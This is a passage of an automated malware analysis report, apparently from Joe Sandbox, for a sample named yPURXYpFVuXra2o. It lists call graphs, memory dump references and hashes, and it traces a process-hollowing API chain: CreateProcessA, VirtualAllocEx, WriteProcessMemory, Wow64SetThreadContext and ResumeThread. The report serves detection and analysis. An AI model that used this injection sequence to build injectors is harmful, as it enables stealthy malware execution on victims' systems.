calls 13985->13992 13993 6c666c8 2 API calls 13985->13993 13994 6c66376 2 API calls 13985->13994 13995 6c66255 2 API calls 13985->13995 13996 6c660d2 2 API calls 13985->13996 13997 6c65fd1 2 API calls 13985->13997 13998 6c66931 2 API calls 13985->13998 13999 6c6605f 2 API calls 13985->13999 14000 6c6617c 2 API calls 13985->14000 13986 6c65b82 13986->13945 13987->13986 13988->13986 13989->13986 13990->13986 13991->13986 13992->13986 13993->13986 13994->13986 13995->13986 13996->13986 13997->13986 13998->13986 13999->13986 14000->13986 14002 6c65f0a 14001->14002 14003 6c66093 14002->14003 14068 6c64bb4 14002->14068 14072 6c64bc0 14002->14072 14007 6c66181 14006->14007 14008 6c660be 14007->14008 14076 6c63836 14007->14076 14080 6c63838 14007->14080 14008->13952 14012 6c66065 14011->14012 14014 6c64bb4 CreateProcessA 14012->14014 14015 6c64bc0 CreateProcessA 14012->14015 14013 6c66093 14014->14013 14015->14013 14017 6c6626c 14016->14017 14018 6c6628d 14016->14018 14084 6c64820 14017->14084 14088 6c64828 14017->14088 14018->13952 14022 6c65f3d 14021->14022 14023 6c66093 14022->14023 14024 6c64bb4 CreateProcessA 14022->14024 14025 6c64bc0 CreateProcessA 14022->14025 14024->14023 14025->14023 14092 6c63d60 14026->14092 14096 6c63d58 14026->14096 14027 6c660f1 14027->13952 14031 6c6625b 14030->14031 14033 6c64820 WriteProcessMemory 14031->14033 14034 6c64828 WriteProcessMemory 14031->14034 14032 6c6628d 14032->13952 14033->14032 14034->14032 14036 6c66944 14035->14036 14101 6c66c88 14036->14101 14106 6c66c98 14036->14106 14037 6c66960 14041 6c666ce 14040->14041 14119 6c64981 14041->14119 14123 6c64988 14041->14123 14042 6c666f4 14046 6c661c4 14045->14046 14048 6c63836 ResumeThread 14046->14048 14049 6c63838 ResumeThread 14046->14049 14047 6c660be 14047->13952 14048->14047 14049->14047 14052 6c64820 WriteProcessMemory 14050->14052 14053 6c64828 WriteProcessMemory 14050->14053 14051 6c660be 14051->13952 14052->14051 14053->14051 14056 6c64820 WriteProcessMemory 14054->14056 14057 6c64828 WriteProcessMemory 14054->14057 14055 6c663b0 14056->14055 14057->14055 14059 6c65f6b 14058->14059 14060 6c66093 14059->14060 14061 6c64bb4 CreateProcessA 14059->14061 14062 6c64bc0 CreateProcessA 14059->14062 14061->14060 14062->14060 14064 6c66830 14063->14064 14066 6c63d60 Wow64SetThreadContext 14064->14066 14067 6c63d58 Wow64SetThreadContext 14064->14067 14065 6c6684b 14066->14065 14067->14065 14069 6c64bb8 CreateProcessA 14068->14069 14071 6c64ea5 14069->14071 14071->14071 14073 6c64c47 CreateProcessA 14072->14073 14075 6c64ea5 14073->14075 14075->14075 14077 6c6387c ResumeThread 14076->14077 14079 6c638ce 14077->14079 14079->14008 14081 6c6387c ResumeThread 14080->14081 14083 6c638ce 14081->14083 14083->14008 14085 6c64824 WriteProcessMemory 14084->14085 14087 6c64913 14085->14087 14087->14018 14089 6c64874 WriteProcessMemory 14088->14089 14091 6c64913 14089->14091 14091->14018 14093 6c63da9 Wow64SetThreadContext 14092->14093 14095 6c63e27 14093->14095 14095->14027 14097 6c63d5e Wow64SetThreadContext 14096->14097 14098 6c63d5c 14096->14098 14100 6c63e27 14097->14100 14098->14027 14100->14027 14102 6c66cad 14101->14102 14111 6c64700 14102->14111 14115 6c646f8 14102->14115 14103 6c66ccc 14103->14037 14107 6c66cad 14106->14107 14109 6c64700 VirtualAllocEx 14107->14109 14110 6c646f8 VirtualAllocEx 14107->14110 14108 6c66ccc 14108->14037 14109->14108 14110->14108 14112 6c64744 VirtualAllocEx 14111->14112 14114 6c647c2 14112->14114 14114->14103 14116 6c646fc VirtualAllocEx 14115->14116 14118 6c647c2 14116->14118 14118->14103 14120 6c64984 ReadProcessMemory 14119->14120 14122 6c64a52 14120->14122 14122->14042 14124 6c649d4 ReadProcessMemory 14123->14124 14126 6c64a52 14124->14126 14126->14042

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID: $ $%$&$&$7$7$X,q$Y$a$g$g$k$k$k$k$$wq
• API String ID: 0-2275180334
• Opcode ID: 1c919216eaf88c7aaf618f6fe96e23e4cf28d0bfb16c2b9b2113209ee47d6633
• Instruction ID: 9d302e89e76a8a9d0c356763047fa4f3ed0eccfb05e3cb06ff24e1cd7e7298b2
• Opcode Fuzzy Hash: 1c919216eaf88c7aaf618f6fe96e23e4cf28d0bfb16c2b9b2113209ee47d6633
• Instruction Fuzzy Hash: A2A21A34600706CFC715EF74C854BAAB7B2BFD9700F618AADD45A6B3A0DB71A985CB40

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID: $ $%$&$&$7$7$X,q$Y$a$g$g$k$k$k$k$$wq
• API String ID: 0-2275180334
• Opcode ID: ce2b0c82cc7bc185a01ff7b914b43ef530741cc2a79e5e09da4080718bbd2f60
• Instruction ID: e3e1004393fe2ff3253450b21ae47a3feb7a7b45dee6a963e1393393ac4d7c3b
• Opcode Fuzzy Hash: ce2b0c82cc7bc185a01ff7b914b43ef530741cc2a79e5e09da4080718bbd2f60
• Instruction Fuzzy Hash: C8A21A34600706CFC715EF74C854BAAB7B2BFD9700F618AADD45A6B3A0DB71A985CB40
Memory Dump Source
• Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2f96ece361537cad916652415d0b553b3edff3178aa9c46cf04866cf37e392a4
• Instruction ID: d223fabef46c77d25e8fce258dc36dac28af2995692a0529efa2933f93b40f90
• Opcode Fuzzy Hash: 2f96ece361537cad916652415d0b553b3edff3178aa9c46cf04866cf37e392a4
• Instruction Fuzzy Hash: 7F22BC71A08254CFCB218FA8C4507BEBBF1BF49714F1889AED5659F692C335C842CB62
Memory Dump Source
• Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5ee904f91f5f9fb1ac1a77066bd85534f2b92a2a3fb2c8f19e413e46a6b0b227
• Instruction ID: d44b5ec720603501ba86c515a422ef7d923a873868253328590b3666252b88bf
• Opcode Fuzzy Hash: 5ee904f91f5f9fb1ac1a77066bd85534f2b92a2a3fb2c8f19e413e46a6b0b227
• Instruction Fuzzy Hash: 3C71FD71A04205CFC7548FE9C9802BAB7F0FB85721F04866BD425EF392E374DA458B62
Memory Dump Source
• Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bffafb6da7d3a0e0d23b05f877712b47dea091d8d46a6bb71cc447ad293e6fd6
• Instruction ID: ec453bb5262ec2bbf73a86f1d842eea2f625aa7173254d0d378366f6c818bedf
• Opcode Fuzzy Hash: bffafb6da7d3a0e0d23b05f877712b47dea091d8d46a6bb71cc447ad293e6fd6
• Instruction Fuzzy Hash: 79311AB5D046188FEB18CFAB990069EBBF7BFC9200F14C4BAD549AB265DB340546CF51

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID: 4qXq$4qXq$4qXq$4qXq$4qXq
• API String ID: 0-3569446578
• Opcode ID: d454b7bac8463b84500975a7901fddcee8ab9d47a89d6f4f79c3d1380d97eef6
• Instruction ID: 98e864017ca816bbcb1afa1aa6c84924dab7cf16607060e350e25c20951c670c
• Opcode Fuzzy Hash: d454b7bac8463b84500975a7901fddcee8ab9d47a89d6f4f79c3d1380d97eef6
• Instruction Fuzzy Hash: D4519F38E08255DFCB058FADC884ABDBBF2BF44B08F5485AAE456AF291C774C941CB51

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID: 4qXq$4qXq$4qXq
• API String ID: 0-3489013445
• Opcode ID: ffc4d97336926969c3cfffa057acca3d644af23391e13c3bd20dc0ffe49bfee1
• Instruction ID: 086cb85211db8acc885dc5b5cb290decd525c18b5dd7b0c12e895c1b7e0698a6
• Opcode Fuzzy Hash: ffc4d97336926969c3cfffa057acca3d644af23391e13c3bd20dc0ffe49bfee1
• Instruction Fuzzy Hash: 3551AC39E04256DFCB118FACC884ABDBBF2FF44B08F1485AAE555AB291C778C941CB51

Control-flow Graph
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06C64E87
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32570669533.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c60000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateProcess
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 963392458-0
                                                                                                                                                                                                        • Opcode ID: 78eb4d0c2e51a31eeb90b0afd7d71c8f5005b5f9c0b8420ae694af206c9e2f81
                                                                                                                                                                                                        • Instruction ID: be7413f88af75608ba5fa9ec756df05dd18d5af1b25039f28ff19e6450ceab89
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 78eb4d0c2e51a31eeb90b0afd7d71c8f5005b5f9c0b8420ae694af206c9e2f81
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A1C11571D002198FDB64DFA9C884BEEBBF1BF49300F1095A9E849B7240DB749A85CF95

Control-flow Graph

• Executed
• Not Executed
control_flow_graph: entry 6c64bc0, basic blocks 6c64bc0-6c6500f; block 6c64dac-6c64ea3 calls CreateProcessA (graph edge list omitted)
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06C64E87
Memory Dump Source
• Source File: 00000003.00000002.32570669533.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c60000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: f5966b018d76c25ca03d4db2eed8e2302b98522d3859e3e84e44dbb4dd05f5b6
• Instruction ID: 7c3a8baa924c724c64a9dc4076357fb36993a3ce3c71818701c7ade42864a109
• Opcode Fuzzy Hash: f5966b018d76c25ca03d4db2eed8e2302b98522d3859e3e84e44dbb4dd05f5b6
• Instruction Fuzzy Hash: 89C12571D002198FDB64DFA9C884BEEBBF1BF49300F1095A9E809B7240DB749A85CF95
Strings
Memory Dump Source
• Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID: \
• API String ID: 0-417808876
• Opcode ID: d1670563e6fea80c805e6d924441e2eda8e1ac2352faeac311eabd2b13e72d90
• Instruction ID: 589ec7ce061fb6e71951a90f76b2a80c4456d789ae688d565720c4b53d357454
• Opcode Fuzzy Hash: d1670563e6fea80c805e6d924441e2eda8e1ac2352faeac311eabd2b13e72d90
• Instruction Fuzzy Hash: 64229D30A04258DFDB148FE8D874FAD77F2BB84B00F25846AE506AF299DB709C41CB95

Control-flow Graph

• Executed
• Not Executed
control_flow_graph: entry 15c31b0, basic blocks 15c31b0-15c3840; internal calls to 15c3b18, 15c2ac0, 15c2824, 15c2ad0 and further resolved targets (15c6098/15c6208/15c5f21, 15c86d8/15c86ca/15c8830, 15c99c0/15c99b0, 15ca098/15ca088, 15cb4d8/15cb4b0, 15c3d07/15c3c40/15c3c30); graph edge list omitted
Strings
Memory Dump Source
• Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID: 4qXq
• API String ID: 0-1583228027
• Opcode ID: 77ff24986aaef9af749321b998543b8cbc626e8a85ca72c418dd9d5c9c70ceec
• Instruction ID: 81a093220b9a9ea069b6b1757531d044fbd8c8d94d4b35d313bbed6004c5bd4a
• Opcode Fuzzy Hash: 77ff24986aaef9af749321b998543b8cbc626e8a85ca72c418dd9d5c9c70ceec
• Instruction Fuzzy Hash: 74F18334B403089FEB949FA8D4687BDB6F2BB89B10F14C469E506AF3D5DA708C41CB95

Control-flow Graph

• Executed
• Not Executed
control_flow_graph: entry 15c74c8, basic blocks 15c74c8-15c7a56; block 15c7659 calls 15c74c8 (self-recursive) / 15c74ba; graph edge list omitted
Strings
Memory Dump Source
• Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID: V
• API String ID: 0-1342839628
• Opcode ID: 605e6d61b312bae0a68744e0194034cb09e2713ddb6e2e06f0e47f0ce1a88f40
• Instruction ID: 9dcf0eac514f31f553fad7eecf98a219d0e85cdc68700847239a8a324a24c48a
• Opcode Fuzzy Hash: 605e6d61b312bae0a68744e0194034cb09e2713ddb6e2e06f0e47f0ce1a88f40
• Instruction Fuzzy Hash: 59F19F30904248CFDB15CFA9C884AAEBBF2FB48711F0485AED4669FA92C734D941CF91

Control-flow Graph

• Executed
• Not Executed
control_flow_graph: entry 6c64820, basic blocks 6c64820-6c6496c; block 6c648aa-6c64911 calls WriteProcessMemory (graph edge list omitted)
APIs
• WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06C648FB
Memory Dump Source
• Source File: 00000003.00000002.32570669533.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c60000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: 0503b75446ff5a1b8717dfa630a0d3befa57db5cc221290f01a8d0466cda1922
• Instruction ID: 8b53621a6015f172b9a4b40e7dc43e5edc6bda6d9f1e09f9d5ed8ebfa847291c
• Opcode Fuzzy Hash: 0503b75446ff5a1b8717dfa630a0d3befa57db5cc221290f01a8d0466cda1922
• Instruction Fuzzy Hash: 7441BEB5D002488FCF14CFA9D984ADEFBF1BB49304F24941AE815B7250D334AA45CF58

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 1328 6c64828-6c64893 1330 6c64895-6c648a7 1328->1330 1331 6c648aa-6c64911 WriteProcessMemory 1328->1331 1330->1331 1333 6c64913-6c64919 1331->1333 1334 6c6491a-6c6496c 1331->1334 1333->1334
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06C648FB
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32570669533.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c60000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3559483778-0
                                                                                                                                                                                                        • Opcode ID: be80c44310fa60396fdf369e3985f494cb2a104bd33bba1049c8db8d17b9c398
                                                                                                                                                                                                        • Instruction ID: 454600484aabe67e9347029af41b873fb7217cfffe8d220b3651c871fe512857
                                                                                                                                                                                                        • Opcode Fuzzy Hash: be80c44310fa60396fdf369e3985f494cb2a104bd33bba1049c8db8d17b9c398
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A041ADB5D012589FCF04CFAAD984ADEFBF1BB49314F24942AE815B7250D334AA45CF68

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 1339 6c64981-6c64982 1340 6c64986-6c64a50 ReadProcessMemory 1339->1340 1341 6c64984-6c64985 1339->1341 1344 6c64a52-6c64a58 1340->1344 1345 6c64a59-6c64aab 1340->1345 1341->1340 1344->1345
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06C64A3A
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32570669533.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c60000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: MemoryProcessRead
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1726664587-0
                                                                                                                                                                                                        • Opcode ID: 2c697553ac302a53f1204897d9dc188e0667c70d2c0e1df064ad79098b9c5e70
                                                                                                                                                                                                        • Instruction ID: 53256de2393d6161e3e31ce97b1ab45266f73195b628ec4562cf7129a2efa545
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c697553ac302a53f1204897d9dc188e0667c70d2c0e1df064ad79098b9c5e70
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4C41BCB9D00258DFCF14CFAAD984AEEFBB1BB58310F14942AE815B7240D734A945CF68

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 1350 6c64988-6c64a50 ReadProcessMemory 1353 6c64a52-6c64a58 1350->1353 1354 6c64a59-6c64aab 1350->1354 1353->1354
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06C64A3A
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32570669533.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c60000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: MemoryProcessRead
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1726664587-0
                                                                                                                                                                                                        • Opcode ID: e8cc024c24fb25a65a72ce46f9668df2f96f8cba58c93b5126d8c7fe77982214
                                                                                                                                                                                                        • Instruction ID: 342f2b0d0d2f33bfbbd56f62e7561e10edd98ba6a7066b99cf3b764f58bf91f6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e8cc024c24fb25a65a72ce46f9668df2f96f8cba58c93b5126d8c7fe77982214
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF419AB9D002589FCF14CFAAD984AEEFBB1BF49310F10942AE815B7240D735A945CF68

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 1359 6c646f8-6c646fa 1360 6c646fe-6c647c0 VirtualAllocEx 1359->1360 1361 6c646fc-6c646fd 1359->1361 1364 6c647c2-6c647c8 1360->1364 1365 6c647c9-6c64813 1360->1365 1361->1360 1364->1365
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06C647AA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32570669533.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c60000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                        • Opcode ID: 5e60b27e5f341d880300968fbd8b086450de062fc1c9854952dcc41a254b8580
                                                                                                                                                                                                        • Instruction ID: 865dd95916d27121514efa9f6fea3288538b2c639c8ae96524482414b31d8034
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e60b27e5f341d880300968fbd8b086450de062fc1c9854952dcc41a254b8580
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B54199B8D002589FCF14CFA9D984ADEBBB1BB59310F10941AE815B7240D735A946CF98

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 1370 6c64700-6c647c0 VirtualAllocEx 1373 6c647c2-6c647c8 1370->1373 1374 6c647c9-6c64813 1370->1374 1373->1374
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06C647AA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32570669533.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c60000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                        • Opcode ID: 7535320ade6e2bd11257e15007f73ad3244fa5b629b20f72addba4b69925965b
                                                                                                                                                                                                        • Instruction ID: f0f2e0539f5d145bd95a9ee5946e782476c9fe4a2d1217efb68924a56daafd0e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7535320ade6e2bd11257e15007f73ad3244fa5b629b20f72addba4b69925965b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80419BB9D002589FCF14CFAAD984ADEFBB1BF59310F10941AE815B7240D735A945CFA8

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 1379 6c63d58-6c63d5a 1380 6c63d5e-6c63dc0 1379->1380 1381 6c63d5c-6c63d5d 1379->1381 1383 6c63dd7-6c63e25 Wow64SetThreadContext 1380->1383 1384 6c63dc2-6c63dd4 1380->1384 1386 6c63e27-6c63e2d 1383->1386 1387 6c63e2e-6c63e7a 1383->1387 1384->1383 1386->1387
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 06C63E0F
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32570669533.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c60000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 983334009-0
                                                                                                                                                                                                        • Opcode ID: 75dad7a26e297612a34fbb4df55bb8caabb18ebac81c442300c6efe125a2159a
                                                                                                                                                                                                        • Instruction ID: 528a9bc8600edb3ac7bfa7a29f302997004c32077b2d30b80eaaffa1cb111d88
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 75dad7a26e297612a34fbb4df55bb8caabb18ebac81c442300c6efe125a2159a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E41AFB5D002589FDB10CFAAD984AEEFBB1BF49314F14942AE419B7240D7389945CF64
                                                                                                                                                                                                        APIs
• Wow64SetThreadContext.KERNEL32(?,?), ref: 06C63E0F
Memory Dump Source
• Source File: 00000003.00000002.32570669533.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c60000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
APIs
• ResumeThread.KERNELBASE(?), ref: 06C638B6
Memory Dump Source
• Source File: 00000003.00000002.32570669533.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c60000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
APIs
• ResumeThread.KERNELBASE(?), ref: 06C638B6
Memory Dump Source
• Source File: 00000003.00000002.32570669533.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c60000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
Strings
Memory Dump Source
• Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID: 4qXq
• API String ID: 0-1583228027
Strings
Memory Dump Source
• Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID: 4qXq
• API String ID: 0-1583228027
Strings
Memory Dump Source
• Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID: 0,wq
• API String ID: 0-2806265506
Strings
Memory Dump Source
• Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID: 0,wq
• API String ID: 0-2806265506
Memory Dump Source
• Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
